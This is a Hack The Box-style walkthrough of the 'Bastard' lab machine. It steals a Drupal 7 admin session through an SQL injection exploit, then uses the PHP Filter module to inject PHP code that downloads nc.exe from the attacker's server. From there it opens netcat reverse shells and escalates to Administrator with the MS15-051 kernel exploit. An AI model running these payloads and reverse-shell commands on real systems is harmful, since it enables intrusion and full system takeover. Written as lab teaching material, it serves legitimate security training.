We pick Bastard from the list:

Foothold

We start with a usual nmap scan:

nmap -sV -T3 -A -p- 10.10.10.9

While it loads we can try popular ports. Open a web browser and go to http://10.10.10.9. We see a Drupal website with the default theme setup.

bastard-drupal

Our scan finishes:

Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-18 18:03 EDT
Nmap scan report for 10.10.10.9
Host is up (0.12s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   127.79 ms 10.10.14.1
2   128.56 ms 10.10.10.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 392.23 seconds

So we know that it is a Drupal version 7 running on a Windows IIS version 7.5.

We can also run directory scan against it as well to see if there are any misconfigured pages open.

nikto -h http://10.10.10.9
bastard-nikto

If we check out a few of those pages from the results, we can see the default instruction text files are left public such as http://10.10.10.9/INSTALL.mysql.txt:

bastard-mysql

The robots.txt file is also left open, which can help us determine how else it is roughly configured:

bastard-robots

Before we start if the nikto scan finishes we can try a directory scan in case there is anything else running on the web server:

dirb http://10.10.10.9 -i

While the web scan is running we could do a search for known exploits and vulnerabilities against Drupal 7.

bastard-search
searchsploit -x 34992

From the list we can see that there are a few sqli vulnerabilities. The Add Admin User one sounds promising. After examining the python script, it looks like it spoofs a browser agent, crafts a URL then does a POST request, injecting a user and a hashed password.

bastard-sqli

User

We can copy it over:

cp /usr/share/exploitdb/exploits/php/webapps/34992.py drupal-create-admin.py

Then run the script:

python drupal-create-admin.py -t http://10.10.10.9 -u admin -p admin
bastard-fail

This could be a true or false positive. For now because we have other exploits we can try we can skip over other sqli vulnerabilities and go to the next one on the list, which may allow us to make a reverse shell.

searchsploit -x 41564

Okay… well nevermind. This one also relies on an sqli. Though because this one works for any version 7 of Drupal and does the sqli through Drupal’s REST API. We’ll try it. Let’s make a copy:

cp /usr/share/exploitdb/exploits/php/webapps/41564.php drupal-7-sqli.php

Then let’s edit it:

vi drupal-7-sqli.php

Already we notice there is some formatting issues with one of the comments going to a new line on line 16:

bastard-format-error

And line 71:

bastard-format-error

After we clean that up we fix up some variables to make it relevant to us. As you can see by default, it is pointing to the script owners test sites:

bastard-default-vars

Since Drupal is running on the root of the Remote web server we can change the $url variable to just http://10.10.10.9.

As for the $endpoint_path, we can double check if that is a real page:

http://10.10.10.9/rest_endpoint
bastard-page-not-found

Back at our dirb scan we can see it found /rest:

bastard-dirb-rest

Okay great.

I took some time to see what data was getting generated and what the sqli query is. In the code I created some var_dumps and some variable echos and ran a few test runs.

bastard-headers-var
bastard-data-var

But we can move forward and update $endpoint_path to be /rest then save and exit with :wq.

Before running this script we can install php-curl if we don’t have it already:

apt -y install php-curl

Then run the file:

php -f drupal-7-sqli.php

This will generate two files: user.json:

bastard-user

And session.json:

bastard-session

Now that we have session cookies we can use them to authenticate ourselves as the admin user.

There are plugins we can use to inject cookies on a site. For my initial test I used Burp Suite:

bastard-burp

When we load the main page now, we can see it authenticates us:

bastard-admin-login

What we would like to do next is find a way to inject our own php code and setup a reverse shell.

Looking up their documentation, at the core Drupal 7 comes with a module called PHP Filter: https://www.drupal.org/docs/7/howtos/add-php-code-to-the-body-of-a-drupal-7-block.

At the admin tool menu, click Modules.

At the Module list modal, look for PHP Filter and check off the box and click Save Changes at the bottom of the modal.

Once saved, we can create a test page with some php code:

  • click on Content
  • click Add Content
  • choose Basic page
  • enter a title in Title
  • enter some test code, such as <?php phpinfo(); ?> for Body
  • select PHP code for Text format
  • click Save
bastard-test-php

Once saved, on the Content list, click on the new page title.

bastard-test-page

As we can see the php code does load:

bastard-php-inject

Great.

This web server is running Windows so we may have to run a web server locally to get the remote system to download netcat so we can attempt a reverse shell.

First we look for a Windows nc.exe file on our machine:

locate nc.exe

And copy it:

cp /usr/share/windows-resources/binaries/nc.exe .

Let’s do another php test to see what the server’s working directory is. Back at the test page Body, we can enter a Command Prompt command:

<?php
echo exec('cd');
?>

Then save and navigate to the test page again. This gives us a directory location that we know for sure exists and that the running user has permission to read, write and execute on.

bastard-php-dir

Then setup our web server:

python -m SimpleHTTPServer 9999

And setup our code on the page that will download the nc.exe and show contents in the directory to prove it downloaded.

<?php

$url = "http://10.10.XX.XX:9999/nc.exe";
file_put_contents("nc.exe", fopen("$url", 'r'));

exec('dir', $output);
foreach ($output as $outputs) {
    echo "$outputs\n";
}
?>

Save the page then refresh the view page. We can see that the download takes place.

bastard-proof-download

When the page loads, we can see the directory contents and see that nc.exe is there.

bastard-proof-nc

We can edit the test page again – this time setting up a netcat reverse shell.

<?php
exec('C:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.10.XX.XX 444');
?>

Save the page. Before viewing and executing the page, on our Local machine we setup a listener:

nc -lvp 444

We refresh the test page and get a connection.

bastard-nc-connect

We can try to go right for the user flag. In the process we find a user: dimitris.

cd C:\Users\dimitris\Desktop\
type user.txt
bastard-user-flag

Privilege Escalation

Now we can begin some system enumeration for privilege escalation starting with systeminfo:

bastard-systeminfo

There is no hotfixes run so we can assume this has never been updated since the initial OS installation.

On our Local machine we can copy and paste the systeminfo output into a file.

vi bastard-systeminfo.txt

Enter insert mode pressing i. Paste the output in and save and exit with ESC:wq.

With this, we can use a comparative tool, Windows Exploit Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester that will figure out what vulnerabilities this machine may have.

wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py

Get the database:

wget http://download.microsoft.com/download/6/7/3/673E4349-1CA5-40B9-8879-095C72D5B49D/BulletinSearch.xlsx

Download requirements

apt -y install python-xlrd

Run the comparison:

python windows-exploit-suggester.py --systeminfo bastard-systeminfo.txt --database BulletinSearch.xlsx
bastard-windows-list

We can look up the ones on the list.

After doing some checking, testing and reading the scripts I decide to move on before going too deep into a rabbit hole. A lot were for incompatible, requiring SP1 or wrong architecture.

We can turn to searchsploit for some Windows Local Privilege Escalation:

searchsploit Windows Local Privilege Escalation

These ones here we have done on Optimum:

bastard-lpe-2

There’s a few more generic ones:

bastard-lpe

When searching some of them I found some were risky on reliability:

bastard-bsod

We can look up another one:

searchsploit -x 37049

It has a text file with an already compiled .exe file location that is provided by Offensive Security: 

wget https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe

I will say, I first copied this file over and ran it and nothing fired. I tried both copies from that link and same thing – nothing happened. It was my guess that it was no longer vulnerable or getting blocked by an AV.

I was close to going back to enumerate some more when I found another source. We can take the zip file and download, extract and move the 64-bit version to our directory on our Local machine:

wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip

unzip MS15-051-KB3045171.zip

cp MS15-051-KB3045171/Source/ms15-051/x64/ms15-051x64.exe .

We can re-use our test page to copy the file over:

<?php

$url = "http://10.10.XX.XX:9999/ms15-051x64.exe";
file_put_contents("ms15-051x64.exe", fopen("$url", 'r'));

exec('nc.exe -e cmd.exe 10.10.XX.XX 4444');

?>

When we refresh the page again we confirm the file copied through our SimpleHTTPServer log and the dir command from our listener connection.

We can then run the executable:

bastard-ms15-051

Great. So it works and gives us some instructions of its usage. Whatever command after the file will be run as Administrator.

We can test it, then setup another netcat connection with a new listener.

On our Local machine:

nc -lvp 1234

And on our Remote shell:

ms15-051x64.exe "nc.exe -e cmd.exe 10.10.XX.XX 1234"

Then once connected we can get the root flag:

bastard-root-flag